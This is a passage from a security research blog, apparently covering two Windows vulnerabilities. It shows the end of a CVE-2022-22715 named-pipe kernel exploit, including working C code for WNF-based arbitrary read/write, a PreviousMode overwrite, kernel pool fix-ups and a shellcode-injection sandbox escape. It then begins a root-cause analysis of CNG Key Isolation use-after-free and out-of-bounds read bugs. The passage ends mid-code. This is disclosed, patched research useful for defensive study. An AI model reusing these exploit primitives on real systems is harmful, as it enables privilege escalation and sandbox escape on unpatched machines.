    Status = fNtUpdateWnfStateData(&gWorkerStateName, CorruptionData, OriginalSize, &TypeID, NULL, NULL, NULL); // ===> control manager object
    if (Status < 0) {
        free(CorruptionData);
        free(FakeSepCached);
        return FALSE;
    }
    // ===>  arbitrary read
    Status = fNtQueryInformationToken(
        TokenHandle,
        TokenBnoIsolation,
        &RecvBuffer,
        RecvBufferSize,
        &RecvBufferSize);

Write Primitive:

    CorruptionData = (PCHAR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, OriginalSize);
    CopyMemory(CorruptionData, gOccupyWorkerToken, OriginalSize);

    *(PUINT64)(CorruptionData + TokenOffset - 0x30) = 2;
    *(PUINT64)(CorruptionData + TokenOffset + 0x8c) = 0x10000;

    *(PUINT64)(CorruptionData + TokenOffset + 0xa8) = (UINT64)pETHREAD + 0x1f0;
    *(PUINT64)(CorruptionData + TokenOffset + 0xb0) = (UINT64)pETHREAD + 0x1e8;
    *(PUINT64)(CorruptionData + TokenOffset + 0xb8) = (UINT64)0;
    fNtUpdateWnfStateData(&gWorkerStateName, CorruptionData, OriginalSize, &TypeID, NULL, NULL, NULL);// ===> control manager object

    pACL = (PACL)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x48);
    pACL->AclRevision = 2;
    pACL->AceCount = 1;
    pACL->AclSize = 0x48;

    pACE = (PACE_HEADER)(pACL + 1);
    pACE->AceSize = 0x48 - sizeof(ACL);
    pACE->AceType = 50;
    *(PUINT64)((ULONG_PTR)pACL + 0x18) = (UINT64)pQueueListEntryFlink;
    *(PUINT64)((ULONG_PTR)pACL + 0x20) = (UINT64)pQueueListEntryBlink;
    *(PUINT64)((ULONG_PTR)pACL + 0x28) = (UINT64)pNextProcessor;
    *(PUINT64)((ULONG_PTR)pACL + 0x30) = (UINT64)pProcess;
    *(PUINT64)((ULONG_PTR)pACL + 0x38) = 0x3;
    *(PUINT64)((ULONG_PTR)pACL + 0x40) = 0x0100000008000000;
    // ===>  arbitrary write
    Status = fNtSetInformationToken(
        TokenHandle,
        TokenDefaultDacl,
        &pACL,
        8);

Stage 4: Elevation of privilege and Fix up

We now have an arbitrary address r/w primitive. At first, I just wanted to replace the process token with the SYSTEM token. It succeeded, but after a while I found that the system crashes easily. For example, since I corrupted some _TOKEN objects, opening Process Explorer makes it traverse the user-space handle table of every process, and the system crashes when Process Explorer accesses the handle table of the exploit process.

I need to fix things up after the exploit, so I decided not to replace the process token and to modify only _ETHREAD->PreviousMode. If I set PreviousMode to 0 and invoke NT APIs such as NtReadVirtualMemory and NtWriteVirtualMemory, the kernel treats the thread as running in kernel mode. This is a common technique for elevating privileges, and it is more convenient for both the elevation and the fix-up than constructing a fake object every time.

Finally, I use the worker object to set _ETHREAD->PreviousMode to 0, and then use NtReadVirtualMemory/NtWriteVirtualMemory to do the elevation of privilege and the fix-up.

There are several things we need to fix.

1. Corrupted _TOKEN object.

I triggered a crash on a corrupted object and realized that it crashes because I corrupted the object type in the object header, so the system crashes as soon as nt references the object. I can read the cookie from the nt data section and calculate the object type value for the object header, so I fix the header of every corrupted _TOKEN object.

    UINT64 pObjHeaderCookie = ntaddr + OBJHEADERCOOKIE;
    BYTE cookie;
    X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pObjHeaderCookie, (UINT64)&cookie, (UINT64)sizeof(BYTE), (UINT64)&dwByte);
    BYTE addrbyte = (pPoolAddress >> 8) & 0xff;
    BYTE offset = cookie ^ addrbyte ^ TokenTypeIndex;
    BYTE bModifiedType;
    for (UINT i = typeindex; i <= modifiedindex; i++) {
        bModifiedType = offset ^ cookie ^ (((pPoolAddress - i * 0x1000) >> 8) & 0xff);
        X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)((UINT64)pPoolAddress - i * 0x1000 + 0x88), (UINT64)&bModifiedType, (UINT64)sizeof(BYTE), (UINT64)&dwByte);
        X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)((UINT64)pPoolAddress - i * 0x1000 + 0x48), (UINT64)&bModifiedType, (UINT64)sizeof(BYTE), (UINT64)&dwByte);
    }
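The calculation in the loop above follows the usual object header type encoding: the stored byte is the raw type index XORed with the header cookie and with bits 8 to 15 of the header address. The helpers below are a minimal sketch with hypothetical names (encode_type_index, decode_type_index); the cookie and address in the example are made-up values, not data from a real system.

```c
#include <stdint.h>

/* Stored (encoded) type byte for an object header at header_addr:
 * raw type index XOR cookie XOR bits 8..15 of the header address. */
uint8_t encode_type_index(uint8_t raw_index, uint8_t cookie,
                          uint64_t header_addr)
{
    return (uint8_t)(raw_index ^ cookie ^ (uint8_t)(header_addr >> 8));
}

/* XOR is its own inverse, so decoding applies the same operation. */
uint8_t decode_type_index(uint8_t stored, uint8_t cookie,
                          uint64_t header_addr)
{
    return (uint8_t)(stored ^ cookie ^ (uint8_t)(header_addr >> 8));
}
```

Decoding the byte of one intact token gives the raw index, which can then be re-encoded for every corrupted header address, since only the address byte differs from page to page.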

2. Corrupted VS pool structure.

This is the most complicated problem I met. I corrupt not only the object structures but also the VS pool structures, which causes unexpected BSoDs. After some deep reversing of the VS allocator, I found that an RBTree manages the VS pool chunks, and that if I know a VS pool address, I can calculate the VS pool manager address.

When a new VS pool chunk is allocated or an old one is freed, the allocator traverses the RBTree from the VS pool manager. If I corrupted a VS pool chunk, the system crashes when the VS pool manager traverses from the root node and accesses the corrupted node.

So I need to find the corrupted node starting from the RBTree root node and delete it from the RBTree. This may leak some memory if other VS pool chunks sit under the corrupted node, but it's better than crashing the system.

I calculate the root VS pool chunk, traverse the RBTree, and delete the node from the RBTree.

  UINT64 zeroSet = 0x0;
    UINT64 ntaddr = KernelSymbolInfo();
    UINT64 pGlobalHeapAddr = ntaddr + GLOBALOFFSET;
    UINT64 pGlobalHeapValue;
    UINT64 pPoolChunkAddr = pPoolAddress & 0xfffffffffff00000;
    UINT64 pPoolChunkValue;
    X64Call(pReadVirtualMemory, 5 , (UINT64)GetCurrentProcess(), (UINT64)pGlobalHeapAddr, (UINT64)&pGlobalHeapValue, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
    X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pPoolChunkAddr + 0x10, (UINT64)&pPoolChunkValue, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
    UINT64 pHpMgrAddr = ((UINT64)pGlobalHeapValue ^ (UINT64)pPoolChunkAddr ^ (UINT64)pPoolChunkValue ^ 0xA2E64EADA2E64EAD) - 0x100 + 0x290; // ======> calculate the VS pool manager address
    UINT64 pRootChunkAddr;
    UINT64 pRightChunk;
    UINT64 pLeftChunk;
    X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pHpMgrAddr, (UINT64)&pRootChunkAddr, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
    X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, (UINT64)&pLeftChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
    X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x8, (UINT64)&pRightChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte); // ====> get the root VS pool address
    UINT64 pTargetChunk = pPoolAddress & 0xffffffffffff0000;
    UINT64 pFinalChunk = NULL;
    UINT64 pTempLeftChunk = pLeftChunk, pTempRightChunk = pRightChunk;
    UINT64 pTempRootChunk;
    pRootChunkAddr = pLeftChunk; // ====> traversal from left chunk
    while (pLeftChunk != 0 && pRightChunk != 0) {
        X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, (UINT64)&pLeftChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
        X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x8, (UINT64)&pRightChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
        if (pTargetChunk == (pRootChunkAddr & 0xffffffffffff0000)) { // parenthesized: == binds tighter than & in C
            X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte);
            X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x10, (UINT64)&pTempRootChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
            break;
        }
        pTempRootChunk = pRootChunkAddr;
        if (pLeftChunk > pRootChunkAddr) {
            X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pLeftChunk, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte);
            pRootChunkAddr = pRightChunk;
            continue;
        }
        else if (pRootChunkAddr > pRightChunk) {
            X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRightChunk, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte);
            pRootChunkAddr = pLeftChunk;
            continue;
        }
        if (pTargetChunk < pRootChunkAddr) {
            pRootChunkAddr = pLeftChunk;
            continue;
        }
        if (pTargetChunk > pRootChunkAddr) {
            pRootChunkAddr = pRightChunk;
            continue;
        }
    }

    pRootChunkAddr = pTempRightChunk; // ====> traversal from right chunk
    while (pLeftChunk != 0 && pRightChunk != 0) {
        X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, (UINT64)&pLeftChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
        X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x8, (UINT64)&pRightChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
        if (pTargetChunk == (pRootChunkAddr & 0xffffffffffff0000)) { // parenthesized: == binds tighter than & in C
            X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte);
            X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x10, (UINT64)&pTempRootChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte);
            break;
        }
        pTempRootChunk = pRootChunkAddr;
        if (pLeftChunk > pRootChunkAddr) {
            X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pLeftChunk, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte);
            pRootChunkAddr = pRightChunk;
            continue;
        }
        else if (pRootChunkAddr > pRightChunk) {
            X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRightChunk, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte);
            pRootChunkAddr = pLeftChunk;
            continue;
        }
        if (pTargetChunk < pRootChunkAddr) {
            pRootChunkAddr = pLeftChunk;
            continue;
        }
        if (pTargetChunk > pRootChunkAddr) {
            pRootChunkAddr = pRightChunk;
            continue;
        }
    }
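The descent in the two loops above can be modeled in user space. This is only a sketch under my own assumptions: the `Node` type and `find_chunk` are hypothetical stand-ins for kernel nodes read through the read primitive, and the sanity checks that overwrite suspicious children with a fake node are left out.

```c
#include <stddef.h>
#include <stdint.h>

#define CHUNK_MASK 0xffffffffffff0000ULL

/* Hypothetical user-space stand-in for a tree node; `address` plays the role
 * of the kernel address that the exploit reads through its primitives. */
typedef struct Node {
    uint64_t address;
    struct Node *left;
    struct Node *right;
} Node;

/* Walk down from `root` until a node lies in the same 64 KiB-aligned chunk as
 * `target`. The mask is parenthesized because == binds tighter than & in C. */
static Node *find_chunk(Node *root, uint64_t target)
{
    Node *cur = root;
    while (cur != NULL) {
        if ((cur->address & CHUNK_MASK) == (target & CHUNK_MASK))
            return cur;
        cur = (target < cur->address) ? cur->left : cur->right;
    }
    return NULL;
}
```

Once the node is found, the real code replaces its links with a fake node so later traversals never touch the corrupted chunk.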

After all these fixes, it's time to pop cmd. Because the Adobe Reader render process runs in a Job, I can't create a process from it, so I inject shellcode into the browser process and write a file to volume C: to complete the exploit.

Patch

Microsoft patched the vulnerability in February 2022. npfs now uses an int type to calculate the total size and checks whether the total size is larger than the maximum ushort value.

NTSTATUS __fastcall NpTranslateContainerLocalAlias(struct _UNICODE_STRING *a1, void *a2, _DWORD *a3)
{
[...]
  if ( v13 )
      {
        if ( TokenInformation )
        {
          v20 = DestinationString.Length + v37.Length;
          v21 = v20 + 120;
          v22 = v20 + 122;
        }
        else
        {
          v21 = v37.Length + 96;
          v22 = v37.Length + 98;
        }
      }
      else
      {
        v21 = DestinationString.Length + 112;
        v22 = DestinationString.Length + 114;
      }
      if ( !v18 )
        v22 = v21;
      v23 = v19 + v22;
      if ( v23 <= 0xFFFE )
      {
        v28.MaximumLength = v23;
        Pool2 = (WCHAR *)ExAllocatePool2(256i64, (unsigned __int16)v23, 1850110030i64);
[...]
}
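To make the effect of the wider type concrete, here is a small sketch. It assumes that the pre-patch code accumulated the length in a 16-bit value; the function and parameter names are hypothetical, and only the `0xFFFE` bound is taken from the patched code above.

```c
#include <stdbool.h>
#include <stdint.h>

/* Pre-patch style (assumed): the sum is stored in 16 bits and silently wraps. */
static uint16_t total_size_truncated(uint16_t name_len, uint16_t alias_len, uint16_t extra)
{
    return (uint16_t)(name_len + alias_len + extra);
}

/* Post-patch style: compute in int and reject anything above 0xFFFE before
 * the value is narrowed to a 16-bit length. */
static bool total_size_checked(uint16_t name_len, uint16_t alias_len, uint16_t extra,
                               uint16_t *out)
{
    int total = (int)name_len + (int)alias_len + (int)extra;
    if (total > 0xFFFE)
        return false;
    *out = (uint16_t)total;
    return true;
}
```

With lengths 0xFF00 and 0x0100 plus 0x78 bytes of fixed overhead, the truncated version yields 0x78, so the allocation is far smaller than the data later copied into it, while the checked version rejects the request.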

Demonstration of how I use the WNF API with an accessible SD

BOOLEAN AllocateWnfObject(DWORD dwWantedSize, PWNF_STATE_NAME pStateName) {
    NTSTATUS Status;
    HANDLE gProcessToken;
    WNF_TYPE_ID TypeID = { 0 };
    PSECURITY_DESCRIPTOR SecurityDescriptor;
    ULONG RetLength = 0;
    BOOL DaclPresent, SaclPresent;
    BOOL DaclDefault, SaclDefault, OwnerDefault, GroupDefault;
    PACL pDacl, pSacl;
    PSID pOwner, pGroup;
    ACE_HEADER* AceHeader;
    ACCESS_ALLOWED_ACE* pACE;
    PSECURITY_DESCRIPTOR GetSD;
    
    Status = fNtOpenProcessToken(GetCurrentProcess(), MAXIMUM_ALLOWED, &gProcessToken);
    if (Status < 0) {
        return FALSE;
    }
    
    SecurityDescriptor = (PSECURITY_DESCRIPTOR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x1000); // initialize a new SD

    GetSD = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x1000);

    Status = fNtQuerySecurityObject(
        gProcessToken,
        OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION | LABEL_SECURITY_INFORMATION,
        GetSD,
        0x1000,
        &RetLength); // Query an accessible SD from the process token

    if (Status < 0)
    {
        return FALSE;
    }

    // Get Owner/Group/DACL/SACL from accessible security object
    GetSecurityDescriptorOwner(GetSD, &pOwner, &OwnerDefault);
    GetSecurityDescriptorGroup(GetSD, &pGroup, &GroupDefault);
    GetSecurityDescriptorDacl(GetSD, &DaclPresent, &pDacl, &DaclDefault);
    GetSecurityDescriptorSacl(GetSD, &SaclPresent, &pSacl, &SaclDefault);

    AceHeader = (ACE_HEADER*)&pDacl[1];
    while ((DWORD)AceHeader < (DWORD)pDacl + (DWORD)pDacl->AclSize)
    {
        if (AceHeader->AceType == ACCESS_ALLOWED_ACE_TYPE)
        {
            pACE = (ACCESS_ALLOWED_ACE*)&AceHeader[0];
            pACE->Mask = GENERIC_ALL;
        }
        AceHeader = (ACE_HEADER*)((DWORD)AceHeader + (DWORD)AceHeader->AceSize);
    }

    // Set them on the new SD
    InitializeSecurityDescriptor(SecurityDescriptor, SECURITY_DESCRIPTOR_REVISION);
    SetSecurityDescriptorOwner(SecurityDescriptor, pOwner, OwnerDefault);
    SetSecurityDescriptorGroup(SecurityDescriptor, pGroup, GroupDefault);
    SetSecurityDescriptorDacl(SecurityDescriptor, DaclPresent, pDacl, DaclDefault);
    SetSecurityDescriptorSacl(SecurityDescriptor, SaclPresent, pSacl, SaclDefault);

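    Status = fNtCreateWnfStateName(
        pStateName,
        WnfTemporaryStateName,      
        WnfDataScopeSession,    
        FALSE,
        &TypeID,
        0x1000,
        SecurityDescriptor);  // invoke WNF API with new SD

    // The new SD is in absolute format and only references the owner, group
    // and ACLs stored inside GetSD, so GetSD is released after the call.
    // HEAP_ZERO_MEMORY is not a HeapFree flag, so 0 is passed instead.
    HeapFree(GetProcessHeap(), 0, GetSD);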

    if (Status < 0)
    {
        return FALSE;
    }

    PVOID lpBuff = (PVOID)malloc(dwWantedSize - 0x20);
    memset(lpBuff, 0x00, dwWantedSize - 0x20);

    Status = fNtUpdateWnfStateData(
        pStateName,
        lpBuff,
        dwWantedSize - 0x20,
        &TypeID,
        NULL,
        0,
        0);

    if (Status < 0)
    {
        return FALSE;
    }
    free(lpBuff);
    return TRUE;
}

Reference

Security Update Guide - Microsoft Security Response Center

CVE-2022-22715 PoC

Timeline

2021-10-17 Reported vulnerability to Microsoft via TianfuCup 2021
2022-02-08 Microsoft released patch, assigned CVE-2022-22715
2022-08-23 Blog post published in partnership with the Adobe Product Security Incident Response Team

Isolate me from sandbox - Explore elevation of privilege of CNG Key Isolation

By: WHEREISK0SHL

1 September 2023 at 11:18

Author: k0shl of Cyber Kunlun

Summary

In recent months, Microsoft patched vulnerabilities I reported in the CNG Key Isolation service, assigned CVE-2023-28229 and CVE-2023-36906. CVE-2023-28229 covers six use-after-free vulnerabilities with a similar root cause, and CVE-2023-36906 is an out-of-bounds read information disclosure. Microsoft marked them as "Exploitation Less Likely" in its assessment, but I actually completed an exploit with these two vulnerabilities.

As an annual-update blogger (sorry for that :P), I am sharing this blog post to introduce my exploitation of the CNG Key Isolation service, so let's start our journey!

Simple Overview

CNG Key Isolation is a service hosted in the lsass process that provides process isolation for private keys. It works as an RPC server that can be accessed from AppContainer integrity processes such as the render processes of Adobe Reader or Firefox. There are some important objects in the keyiso service; let's go through them briefly:

Context object. The context object is the management object of the keyiso RPC server. It holds the provider object when the client invokes open storage provider to create a new provider object, and it is managed by a global list named SrvCryptContextList. This object must be initialized first.
Provider object. The client opens an existing provider from the collection of all providers. If the open succeeds, keyiso allocates the provider object and stores its pointer in the context object.
Key object. The key object is managed by the context object; it is allocated and inserted into the context object.
Memory Buffer object. The memory buffer object is managed by the context object; it is allocated and inserted into the context object.
Secret object. The secret object is managed by the context object; it is allocated and inserted into the context object.

Among these objects, the provider, key, and secret objects have a similar structure. Offset 0x0 of the object stores the magic value: 0x44444446 means provider object, 0x44444447 means key object, and 0x44444449 means secret object. When one of these objects is freed, the magic value is set to another value. Offset 0x8 stores the reference count, and offset 0x30 stores the index of the object. This index works like a handle: the client passes it to look up the specified object. It is predictable, because it begins at 0 and increases by 1 each time a new object is allocated.
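The layout described above can be written down as a C structure. This is only a sketch for the key object: the field names are my own, the 0x38 size and the fields at 0x20 and 0x28 come from the decompiled code later in this post, and the list links at 0x10 are an assumption.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Sketch of the key object; names are hypothetical. */
typedef struct KeyObjectSketch {
    uint32_t magic;        /* 0x00: 0x44444447 for a key object            */
    uint32_t reserved;     /* 0x04: zeroed on creation                     */
    uint32_t ref_count;    /* 0x08: reference count                        */
    uint32_t padding;      /* 0x0C                                         */
    uint64_t list_flink;   /* 0x10: assumed list links in the context list */
    uint64_t list_blink;   /* 0x18                                         */
    uint64_t provider;     /* 0x20: pointer used for the indirect call     */
    uint64_t inner_key;    /* 0x28: second argument of the indirect call   */
    uint64_t handle;       /* 0x30: predictable index returned to client   */
} KeyObjectSketch;

static_assert(offsetof(KeyObjectSketch, ref_count) == 0x08, "refcount at 0x8");
static_assert(offsetof(KeyObjectSketch, provider) == 0x20, "provider at 0x20");
static_assert(offsetof(KeyObjectSketch, handle) == 0x30, "handle at 0x30");
static_assert(sizeof(KeyObjectSketch) == 0x38, "allocation size is 0x38");

typedef enum { KIND_UNKNOWN, KIND_PROVIDER, KIND_KEY, KIND_SECRET } ObjectKind;

/* Map the magic value at offset 0x0 to the object kind listed in the text. */
static ObjectKind keyiso_object_kind(uint32_t magic)
{
    switch (magic) {
    case 0x44444446u: return KIND_PROVIDER;
    case 0x44444447u: return KIND_KEY;
    case 0x44444449u: return KIND_SECRET;
    default:          return KIND_UNKNOWN;
    }
}
```

The static assertions only check that the sketch agrees with the offsets quoted in the text; they say nothing about the real private structure.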

One more detail explains how I win the race using the object handle. When reviewing the code, I noticed that the handle is predictable. Let's check the SrvAddKeyToList function:

SrvAddKeyToList:
  handlevalue = ++*(_QWORD *)(context_object + 0xA0); // =====> [a]
  *(_QWORD *)(key_object + 0x30) = handlevalue; // =====> [b]

SrvFreeKey:
  if ( *((_QWORD *)key_object + 6) == handlevalue ) // ====> [c]
      break;

The handle value is stored at offset 0xA0 of the context object and is in fact just an index. Its initial value is 0; when a new key object is allocated, the index is incremented by 1 [a] and stored at offset 0x30 of the new key object [b]. When a key object is freed, the handle value is compared, and if it matches [c], execution continues into the vulnerable code. The handle value is therefore predictable: for example, you can call SrvFreeKey with handle value 1 right when you create the first key, or with handle value 10 when you create the tenth key object, so that the free path finds the key object as soon as it is added to the context object with the new handle value.

I made the following simple chart to show the relationship between these objects.
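A tiny model of steps [a] and [b] shows why the next handle can be guessed before the object exists. The types and function names below are hypothetical; only the pre-increment and the store come from the snippet above.

```c
#include <stdint.h>

/* Hypothetical stand-ins for the counter at context+0xA0 and the handle
 * field at key+0x30. */
typedef struct ContextSketch { uint64_t last_handle; } ContextSketch;
typedef struct KeySketch { uint64_t handle; } KeySketch;

/* Mirrors [a] and [b]: pre-increment the counter, store it in the key. */
static uint64_t add_key_to_list(ContextSketch *ctx, KeySketch *key)
{
    uint64_t handle = ++ctx->last_handle;  /* [a] */
    key->handle = handle;                  /* [b] */
    return handle;
}

/* What a client can compute on its own before the key is even created. */
static uint64_t predict_next_handle(const ContextSketch *ctx)
{
    return ctx->last_handle + 1;
}
```

A client that counts its own allocations therefore knows the handle of the key being created and can issue the free request for it in parallel.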

Root cause of CVE-2023-28229

In this section, I will introduce the root cause of CVE-2023-28229. I will use the key object as the example; the other objects have similar issues.

While researching the keyiso service, I found that each object has its own allocate and free interfaces. For the key object, the allocate RPC interface is s_SrvRpcCryptCreatePersistedKey and the free RPC interface is s_SrvRpcCryptFreeKey. I quickly noticed an issue between object allocation and free.

__int64 __fastcall SrvCryptCreatePersistedKey(
        struct _RTL_CRITICAL_SECTION *a1,
        __int64 a2,
        _QWORD *a3,
        __int64 a4,
        __int64 a5,
        int a6,
        int a7)
{
[...]
    keyobject = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 0x38ui64);
[...]
    *((_DWORD *)keyobject + 1) = 0;
    *(_DWORD *)keyobject = 0x44444447;
    *((_DWORD *)keyobject + 2) = 1; // ==========> [a]
    *((_QWORD *)keyobject + 4) = v12;
    SrvAddKeyToList((__int64)a1, (__int64)keyobject); // =============> [b]
    v11 = 0;
    *a3 = *((_QWORD *)keyobject + 6);
    return v11;
[...]
}

__int64 __fastcall SrvCryptFreeKey(__int64 a1, __int64 a2, __int64 a3)
{
[...]
  if ( _InterlockedExchangeAdd(freebuffer + 2, 0xFFFFFFFF) == 1 ) // ============> [c]
  {
    v17 = SrvFreeKey((PVOID)freebuffer); // ===============> [d]
    if ( v17 < 0 )
      DebugTraceError(
        (unsigned int)v17,
        "Status",
        "onecore\\ds\\security\\cryptoapi\\ncrypt\\iso\\service\\srvutils.c",
        700i64);
  }
  if ( _InterlockedExchangeAdd(freebuffer + 2, 0xFFFFFFFF) == 1 ) // ===============> [e]
  {
    v12 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*((_QWORD *)freebuffer + 4) + 0x80i64))( // ==============> [f]
            *(_QWORD *)(*((_QWORD *)freebuffer + 4) + 0x118i64),
            *((_QWORD *)freebuffer + 5));
    v13 = v12;
[...]
}

When the client invokes the allocate RPC interface, keyiso allocates a buffer from the process heap and initializes the structure. It first sets the reference count of the key object to 1 [a], then adds the key object to the context object and increments the reference count [b]. When the client frees the key object, keyiso checks whether the reference count is 1 [c]; if it is, keyiso frees the key object [d]. However, it still uses the key object after the free [e] and then calls a function through the vftable [f].

No lock is held between initializing the reference count to 1 and incrementing it, which leaves a time window between the initialization and the increment. The key object can be freed [c] [d] after the reference count is set to 1 [a], and it then passes the next check [e] once the reference count is incremented [b]. Finally, this causes a use after free when the vftable function is called [f].

I wrote a PoC and figured out that it might be exploitable. But as the code above shows, the vftable function is fetched through the pointer stored at offset 0x20 of the key object, which means that even if I control the freed buffer, I still need a valid address at offset 0x20 of the key object. I need an information disclosure.
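The interleaving can be replayed deterministically in a single thread. The model below is only a sketch: the `KeyModel` type and the step functions are hypothetical, and each step corresponds to one of the labels [a] to [f] in the decompiled code.

```c
#include <stdbool.h>
#include <stdint.h>

typedef struct KeyModel {
    int32_t ref_count;
    bool freed;
    bool used_after_free;
} KeyModel;

/* Like _InterlockedExchangeAdd: add delta and return the previous value. */
static int32_t exchange_add(int32_t *value, int32_t delta)
{
    int32_t old = *value;
    *value += delta;
    return old;
}

static void create_init(KeyModel *k)        { k->ref_count = 1; }   /* [a] */
static void create_add_to_list(KeyModel *k) { k->ref_count += 1; }  /* [b] */

static void free_first_check(KeyModel *k)                           /* [c] [d] */
{
    if (exchange_add(&k->ref_count, -1) == 1)
        k->freed = true;
}

static void free_second_check(KeyModel *k)                          /* [e] [f] */
{
    /* The indirect call happens whenever the old count was 1. */
    if (exchange_add(&k->ref_count, -1) == 1 && k->freed)
        k->used_after_free = true;
}

/* The free request lands between [a] and [b]. */
static bool run_racy_interleaving(void)
{
    KeyModel k = {0, false, false};
    create_init(&k);
    free_first_check(&k);
    create_add_to_list(&k);
    free_second_check(&k);
    return k.used_after_free;
}

/* Creation finishes before the free request starts. */
static bool run_normal_order(void)
{
    KeyModel k = {0, false, false};
    create_init(&k);
    create_add_to_list(&k);
    free_first_check(&k);
    free_second_check(&k);
    return k.used_after_free;
}
```

In the racy order the first decrement sees 1 and frees the object, the late increment brings the count back to 1, and the second decrement passes its check on memory that is already freed.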

Root Cause of CVE-2023-36906

So I looked for an information disclosure. Going through the RPC interfaces, I found a property structure stored in the provider object; the property can be set and queried through the RPC interfaces SPCryptSetProviderProperty and SPCryptGetProviderProperty.

__int64 __fastcall SPCryptSetProviderProperty(__int64 a1, const wchar_t *a2, _DWORD *a3, unsigned int a4, int a5)
{
[...]
    if ( !wcscmp_0(a2, L"Use Context") )
    {
      v15 = *(void **)(v8 + 32);
      if ( v15 )
        RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v15);
      Heap = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, v6);
      *(_QWORD *)(v8 + 32) = Heap;
      if ( !Heap )
      {
        v10 = 1450i64;
LABEL_21:
        v9 = -2146893810;
        v11 = 2148073486i64;
        goto LABEL_42;
      }
      v17 = Heap;
      goto LABEL_40;
      }
      memcpy_0(v17, a3, v6); // ============> [b]
    } 
[...]
}

__int64 __fastcall SPCryptGetProviderProperty(
        __int64 a1,
        const wchar_t *a2,
        _DWORD *a3,
        unsigned int a4,
        unsigned int *a5,
        int a6)
{
[...]
    if ( !wcscmp_0(a2, L"Use Context") )
    {
      v17 = *(_QWORD *)(v10 + 32);
      v15 = 21;
      if ( !v17 )
        goto LABEL_31;
      do
        ++v13;
      while ( *(_WORD *)(v17 + 2 * v13) ); // =============> [c]
      v16 = 2 * v13 + 2;
      if ( 2 * (_DWORD)v13 == -2 )
      {
LABEL_31:
        v11 = 517i64;
LABEL_32:
        v9 = -2146893807;
        v12 = 2148073489i64;
        goto LABEL_57;
      }
      v25 = *(const void **)(v10 + 32);
      memcpy_0(a3, v25, v16); // ============> [d]
    } 
[...]
}

The client can specify which property to set. If the property is named "Use Context", keyiso allocates a new buffer whose size is controlled by the client and stores the "Use Context" buffer in the provider object. But when reviewing the query code, I noticed that "Use Context" is treated as a string: the code walks the buffer in a while loop, stops when it meets the null character [c], and then returns the whole buffer to the client [d].

This yields an out-of-bounds read when I set the "Use Context" property with a buffer that contains no zero character. This property is also a good object for exploitation, because the client controls both the size and the content of the buffer.
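The over-read can be reproduced safely inside a single array that stands in for the heap. This is a sketch under stated assumptions: a little-endian host, a hypothetical 4-character property, and a neighbor that holds one pointer-sized value. The length loop follows the logic at [c].

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PROPERTY_UNITS 4   /* hypothetical property size in 16-bit units */

/* Length computation in the style of [c]: count 16-bit units up to the first
 * zero unit, then report the byte count including that terminator. */
static size_t query_length_bytes(const uint16_t *buffer)
{
    size_t count = 0;
    while (buffer[count] != 0)
        ++count;
    return 2 * count + 2;
}

/* Place a fully non-zero property directly in front of a neighbor value and
 * report how many bytes the getter would copy out; `leaked` receives the
 * bytes that lie beyond the property. */
static size_t simulate_leak(uint64_t neighbor_value, uint64_t *leaked)
{
    uint16_t arena[PROPERTY_UNITS + 4 + 1];
    size_t bytes, extra;

    for (size_t i = 0; i < PROPERTY_UNITS; ++i)
        arena[i] = 0x4141;                        /* no terminator inside */
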